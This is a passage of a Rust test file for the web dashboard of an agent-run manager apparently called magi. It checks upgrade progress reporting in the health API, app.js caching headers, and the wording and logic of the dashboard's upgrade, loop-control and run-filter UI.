8875 let repo = TempDir::new().expect("repo dir");
8880 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8881 .expect("write magi.toml");
8882 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8883
8884 let health = fx.get("/api/health").await.json();
8885 assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
8886 assert_eq!(
8887 health["update"]["available"], false,
8888 "checking is off, which reads as \"unknown\", not \"none\""
8889 );
8890 assert!(health["update"]["to"].is_null());
8891 assert!(
8892 health["upgrade"].is_null(),
8893 "nothing has ever asked this deck to upgrade"
8894 );
8895 }
8896
8897 #[tokio::test]
8898 async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
8899 let fx = Fixture::start().await;
8900 write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
8901
8902 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8903 progress.parked_run = Some("20260905-000000-cd51".to_owned());
8904 progress.advance(crate::updater::Stage::Parking);
8905 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8906
8907 let health = fx.get("/api/health").await.json();
8908 assert_eq!(health["upgrade"]["stage"], "parking");
8909 assert_eq!(health["upgrade"]["from"], "0.5.1");
8910 assert_eq!(health["upgrade"]["to"], "0.5.2");
8911 let waiting_on = health["upgrade"]["waiting_on"]
8912 .as_str()
8913 .expect("waiting_on is set while parking a known run");
8914 assert!(waiting_on.contains("cd51"), "{waiting_on}");
8915 assert!(waiting_on.contains("implementing"), "{waiting_on}");
8916 }
8917
8918 #[tokio::test]
8919 async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
8920 let fx = Fixture::start().await;
8921 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8922 progress.advance(crate::updater::Stage::Done);
8923 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
8924
8925 let health = fx.get("/api/health").await.json();
8926 assert_eq!(health["upgrade"]["stage"], "done");
8927 assert!(
8928 health["upgrade"]["waiting_on"].is_null(),
8929 "nothing to wait on once it is done"
8930 );
8931 }
8932
8933 #[tokio::test]
8934 async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
8935 let home = TempDir::new().expect("temp home");
8936 let runs = home.path().join("runs");
8937 std::fs::create_dir_all(&runs).expect("runs dir");
8938 let ui = Ui::new(
8939 Queue::at(home.path().join("queue")),
8940 Questions::at(home.path().join("questions")),
8941 Talks::at(home.path().join("talks")),
8942 runs,
8943 home.path().to_path_buf(),
8944 PathBuf::from("/repo/magi"),
8945 )
8946 .with_launch(launch_idle);
8947 let looping = ui.looping();
8948 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
8949 .await
8950 .expect("bind loopback");
8951 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
8952
8953 let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
8954 crate::updater::write_progress(home.path(), &progress).expect("seed progress");
8955
8956 hand_over(home.path(), &looping, served, || Ok(()))
8957 .await
8958 .expect("hand over");
8959
8960 let after = crate::updater::read_progress(home.path()).expect("progress on disk");
8961 assert_eq!(
8962 after.stage,
8963 crate::updater::Stage::Restarting,
8964 "hand_over owns the record through parking and up to restarting; \
8965 the successor is what finishes it"
8966 );
8967 }
8968
8969 #[test]
8970 fn the_upgrade_button_arms_before_it_restarts_anything() {
8971 assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
8974 assert!(APP_JS.contains("Replace the binary and restart?"));
8975 assert!(APP_JS.contains("function confirmed("));
8976 assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
8981 assert!(
8985 APP_JS.contains("Parking, then restarting"),
8986 "the button says what it is waiting for"
8987 );
8988 assert!(APP_JS.contains("if (!out.to)"));
8991 }
8992
8993 #[test]
8994 fn stopping_the_loop_arms_but_starting_does_not() {
8995 assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
8998 assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
8999 assert!(APP_JS.contains("confirmed(button, question)"));
9000 assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n }\n }, 6000)"));
9003 assert!(APP_JS.contains("const label = btn.textContent;"));
9004 assert!(!APP_JS.contains("Neither direction is guarded"));
9005 }
9006
9007 #[test]
9008 fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
9009 assert!(
9010 APP_JS.contains("state.health.version"),
9011 "the operator wants to know what is running even with nothing newer"
9012 );
9013 assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
9014 }
9015
9016 #[test]
9017 fn the_upgrade_button_names_its_destination() {
9018 assert!(
9019 APP_JS.contains("`Update to ${update.to}`"),
9020 "pressing the button should not be a surprise about what it moves to"
9021 );
9022 }
9023
9024 #[test]
9025 fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
9026 for stage in ["downloading", "replaced", "parking", "restarting"] {
9027 assert!(
9028 APP_JS.contains(&format!("\"{stage}\"")),
9029 "the phone must be able to tell {stage} apart from the others"
9030 );
9031 }
9032 assert!(APP_JS.contains(".waiting_on"));
9033 assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
9038 assert!(APP_JS.contains("reconnects on its own"));
9039 }
9040
9041 #[test]
9042 fn a_failed_upgrade_does_not_lock_the_loop_controls() {
9043 let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
9052 ..APP_JS.find("function upgrade(").expect("upgrade")];
9053 assert!(
9054 !body.contains(
9055 "upgradeStage === \"failed\") {\n setAttr(box, \"data-state\", \"failed\")"
9056 ),
9057 "a failed upgrade must not take the whole strip over the way it used to"
9058 );
9059 assert!(
9060 body.contains("upgradeFailNote"),
9061 "the failure has to reach the loop's own note instead"
9062 );
9063 assert_eq!(
9067 body.matches("upgradeFailNote].filter(Boolean).join")
9068 .count(),
9069 2,
9070 "both loop-why writers (quiet and control) must fold the note in"
9071 );
9072 }
9073
9074 #[test]
9075 fn an_overdue_upgrade_eventually_asks_for_a_human() {
9076 assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
9079 assert!(APP_JS.contains("function upgradeOverdue("));
9080 }
9081
9082 #[test]
9083 fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
9084 assert!(
9085 APP_JS.contains("Updated to ${upgradeInfo.to"),
9086 "the operator who asked for the restart wants to know it worked"
9087 );
9088 }
9089
9090 #[test]
9091 fn an_error_is_visible_from_where_the_button_is() {
9092 let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
9097 ..APP_CSS.find(".alert-text").expect(".alert-text")];
9098 assert!(
9099 alert.contains("position: fixed"),
9100 "an error about the thing under your thumb has to be visible from \
9101 where your thumb is: {alert}"
9102 );
9103 assert!(
9104 alert.contains("z-index: 25"),
9105 "above the dock (20) and the run-actions FAB (15), so neither \
9106 buries it: {alert}"
9107 );
9108 assert!(
9109 alert.contains("var(--tap)"),
9110 "and clear of the dock and the home indicator: {alert}"
9111 );
9112 assert!(
9115 alert.contains("var(--s4) + var(--tap) + var(--s3)"),
9116 "the FAB's column stays free: {alert}"
9117 );
9118 }
9119
9120 #[tokio::test]
9121 async fn an_older_attempt_says_what_replaced_it() {
9122 let fx = Fixture::start().await;
9123 let q = fx.queue();
9124 let runs = fx.runs();
9125 let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
9126 write_run(&runs, first, RunStatus::Stalled);
9127 write_run(&runs, second, RunStatus::Blocked);
9128
9129 let mut t = Task::new(
9130 "one task".to_owned(),
9131 "do it".to_owned(),
9132 PathBuf::from("/repo"),
9133 Source::Human,
9134 );
9135 t.runs = vec![first.to_owned(), second.to_owned()];
9136 q.put(&mut t).expect("put");
9137
9138 let rows = fx.get("/api/runs").await.json();
9142 let by = |short: &str| -> Value {
9143 rows.as_array()
9144 .unwrap()
9145 .iter()
9146 .find(|r| r["short"] == short)
9147 .cloned()
9148 .unwrap_or(Value::Null)
9149 };
9150 assert_eq!(by("aaaa")["superseded_by"], "bbbb");
9151 assert!(
9152 by("bbbb")["superseded_by"].is_null(),
9153 "the latest attempt is not superseded by anything"
9154 );
9155 assert!(APP_JS.contains("run.superseded_by"));
9157 assert!(APP_JS.contains("Superseded by"));
9158 }
9159
9160 #[tokio::test]
9161 async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
9162 let fx = Fixture::start().await;
9163 let js = fx.get("/app.js").await;
9169 assert_eq!(js.status, 200);
9170 let tag = js
9171 .header("etag")
9172 .expect("an etag to revalidate against")
9173 .to_owned();
9174 assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
9175 assert_eq!(
9176 js.header("cache-control"),
9177 Some("no-cache, must-revalidate"),
9178 "the phone has to ask every time"
9179 );
9180
9181 let again = fx
9184 .get_with("/app.js", &[("if-none-match", tag.as_str())])
9185 .await;
9186 assert_eq!(
9187 again.status, 304,
9188 "a deck it already has costs one round trip"
9189 );
9190 assert!(again.body.is_empty(), "304 carries no body");
9191
9192 let weak = fx
9195 .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
9196 .await;
9197 assert_eq!(weak.status, 304);
9198 let stale = fx
9199 .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
9200 .await;
9201 assert_eq!(stale.status, 200, "an older build must be replaced");
9202 assert!(stale.body.contains("renderRunActions"));
9203 }
9204
9205 #[test]
9206 fn the_deck_never_sends_the_operator_to_a_terminal() {
9207 assert!(
9210 !APP_JS.contains("Run `magi fold` first"),
9211 "the deck must offer the fold, not prescribe a shell command"
9212 );
9213 assert!(APP_JS.contains("foldRun:"));
9214 assert!(APP_JS.contains("resumeRun:"));
9215 assert!(APP_JS.contains("renderRunActions"));
9216
9217 assert!(APP_JS.contains("armedFold"));
9219 assert!(APP_JS.contains("Yes, fold worktrees"));
9220
9221 assert!(APP_JS.contains("can no longer be resumed"));
9224 }
9225
9226 #[test]
9227 fn a_finished_run_explains_itself_with_its_own_last_line() {
9228 assert!(
9234 !APP_JS.contains("collapsed on agent quota"),
9235 "a stall must not be explained by a cause the deck did not check"
9236 );
9237 assert!(
9238 !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
9239 "and a block must not offer a guess with an `or` in it"
9240 );
9241
9242 assert!(
9246 APP_JS.contains("setText(r.event, run.event || \"\")"),
9247 "the run's last line is rendered unconditionally"
9248 );
9249 assert!(
9250 !APP_JS.contains("moving && run.event"),
9251 "and never gated on the run still moving"
9252 );
9253
9254 assert!(APP_JS.contains("lost to quota"));
9256 }
9257
9258 #[test]
9280 fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
9281 let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
9282 let shapes_body_start =
9283 APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
9284 let shapes_close = APP_JS[shapes_body_start..]
9285 .find("].map(")
9286 .expect("the shape list is closed by its done-computing .map(...)")
9287 + shapes_body_start;
9288 let shapes_src = &APP_JS[shapes_body_start..shapes_close];
9289
9290 let mut shapes: Vec<(bool, String, bool)> = Vec::new();
9291 for entry in shapes_src.split('{').skip(1) {
9292 let waiting = entry.contains("waiting: true");
9293 let dead = entry.contains("live: \"dead\"");
9294 let status_at =
9295 entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
9296 let status_end = entry[status_at..]
9297 .find('"')
9298 .expect("the status string is closed")
9299 + status_at;
9300 shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
9301 }
9302 assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
9303
9304 let done_rule_marker = "done: !";
9308 let done_rule_at = APP_JS[shapes_close..]
9309 .find(done_rule_marker)
9310 .expect("the done rule follows the shape list")
9311 + shapes_close
9312 + done_rule_marker.len();
9313 let includes_at = APP_JS[done_rule_at..]
9314 .find(".includes(shape.status)")
9315 .expect("the done rule ends in .includes(shape.status)")
9316 + done_rule_at;
9317 let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
9318 .trim()
9319 .trim_start_matches('[')
9320 .trim_end_matches(']')
9321 .split(',')
9322 .map(|s| s.trim().trim_matches('"'))
9323 .filter(|s| !s.is_empty())
9324 .collect();
9325
9326 let shapes: Vec<(bool, String, bool, bool)> = shapes
9327 .into_iter()
9328 .map(|(waiting, status, dead)| {
9329 let done = !not_done.contains(&status.as_str());
9330 (waiting, status, dead, done)
9331 })
9332 .collect();
9333
9334 fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
9338 if waiting {
9339 return "waiting";
9340 }
9341 if dead
9342 && !matches!(
9343 status,
9344 "merged" | "ready" | "stalled" | "blocked" | "failed" | "verified_noop"
9345 )
9346 {
9347 return "stale";
9348 }
9349 match status {
9350 "merged" | "ready" => "landed",
9351 "stalled" | "blocked" | "failed" | "verified_noop" => "ended",
9352 _ => "flight",
9353 }
9354 }
9355
9356 fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
9359 match filter_key {
9360 "active" => !done,
9361 "flight" => !done && !waiting && !dead,
9362 "stale" => !done && !waiting && dead,
9363 "waiting" => waiting,
9364 "done" => done,
9365 "all" => true,
9366 other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
9367 }
9368 }
9369
9370 let compatible = |section: &str, filter_key: &str| {
9371 shapes.iter().any(|(waiting, status, dead, done)| {
9372 run_section(*waiting, status, *dead) == section
9373 && filter_matches(filter_key, *waiting, *dead, *done)
9374 })
9375 };
9376
9377 let expected = [
9382 ("waiting", [true, false, false, true, true, true]),
9383 ("stale", [true, false, true, false, false, true]),
9384 ("flight", [true, true, false, false, false, true]),
9385 ("landed", [false, false, false, false, true, true]),
9386 ("ended", [false, false, false, false, true, true]),
9387 ];
9388 let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
9389
9390 for (section, wants) in expected {
9391 for (filter_key, want) in filter_keys.iter().zip(wants) {
9392 assert_eq!(
9393 compatible(section, filter_key),
9394 want,
9395 "section {section:?} x filter {filter_key:?} should be compatible: {want}"
9396 );
9397 }
9398 }
9399
9400 assert!(
9403 APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
9404 );
9405 assert!(APP_JS.contains(
9406 "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
9407 ));
9408 assert!(APP_JS.contains(
9409 "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
9410 ));
9411 }
9412
9413 #[tokio::test]
9414 async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
9415 let dir = tempfile::tempdir().expect("tempdir");
9419 let explicit = dir.path().join("not-a-checkout");
9420 std::fs::create_dir_all(&explicit).expect("create dir");
9421 assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
9422
9423 let missing = dir.path().join("does-not-exist-at-all");
9424 assert_eq!(normalize_default_repo(missing.clone()).await, missing);
9425 }
9426}